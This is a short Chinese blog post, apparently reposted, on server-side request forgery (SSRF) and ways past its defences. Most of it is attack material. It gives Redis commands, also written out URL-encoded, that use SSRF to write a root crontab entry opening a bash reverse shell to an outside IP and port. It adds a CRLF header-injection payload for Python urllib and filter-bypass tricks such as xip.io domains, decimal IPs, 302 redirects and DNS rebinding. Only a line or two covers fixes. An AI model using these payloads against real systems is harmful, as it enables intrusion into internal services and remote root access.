美文网首页
ssrf原理和绕过姿势

ssrf原理和绕过姿势

作者: sum3mer | 来源:发表于2017-08-08 18:07 被阅读0次

转自paper.tuisec.win/detail-f2b26ca1c3d5b53.html

通过ssrf利用内网中的redis服务器,构造脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/ip/port" 0>&1 \n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

进行url编码:test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

ssrf in python

python http头注入漏洞,当使用了urllib库时,请求url为用户可控时,可能出现ssrf

./test.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

修复方案:限制协议为http,https

限制302重定向、设置url白名单或限制内网ip

绕过技巧:

添加端口号

指向任意ip的域名xip.io

10.0.0.1.xip.io  resolves to  10.0.0.1

www.10.0.0.1.xip.ioresolves to   10.0.0.1

mysite.10.0.0.1.xip.io   resolves to   10.0.0.1

foo.bar.10.0.0.1.xip.io   resolves to   10.0.0.1

ip限制绕过:转十进制、构造302跳转服务、DNS rebinding



相关文章

  • ssrf原理和绕过姿势

    转自paper.tuisec.win/detail-f2b26ca1c3d5b53.html 通过ssrf利用内网...

  • SSRF绕过

    1):将IP转换为长整型 2):使用URL中有认证内容绕过:http://www.baidu.com@127.0....

  • SSRF绕过方法总结

    前言 昨天忘了在公众号还是微博上看到的了,看到一个SSRF绕过的技巧,使用的是ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ绕过的,自己也...

  • 云服务器报wordpress /wp-includes/http

    一、wordpress函数wp_http_validate_url畸形IP绕过验证SSRF漏洞 原文:https:...

  • SSRF绕过方法总结【转载】

    SSRF绕过方法总结 0x00 SSRF是什么 能精简的就不扯淡,一句话就是:利用一个可以发起网络请求的服务当作跳...

  • 如何绕过WAF之混淆注入原理

    定义和原理 混淆和绕过普通的注入方式过于明显,很容易被检测。因此,需要改变攻击的手法,绕过检测和绕过,即混淆和绕过...

  • weblogic漏洞系列-SSRF漏洞

    0x01前言: SSRF漏洞的原理这里就不在细说了,这里主要讲解weblogic中SSRF漏洞的检测办法,以及利用...

  • 长亭chaitin.cn的技术面

    宽字节注入的原理 CSRF原理及防御 SSRF原理及防御 xss:expression()支持的浏览器 渗透的几个...

  • SSRF攻击原理

    以下均转自:http://zeroyu.xyz/2018/03/06/introduction-to-ssrf/ ...

  • SSRF攻击姿势汇总

    前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、prot...

网友评论

      本文标题:ssrf原理和绕过姿势

      本文链接:https://www.haomeiwen.com/subject/mbpalxtx.html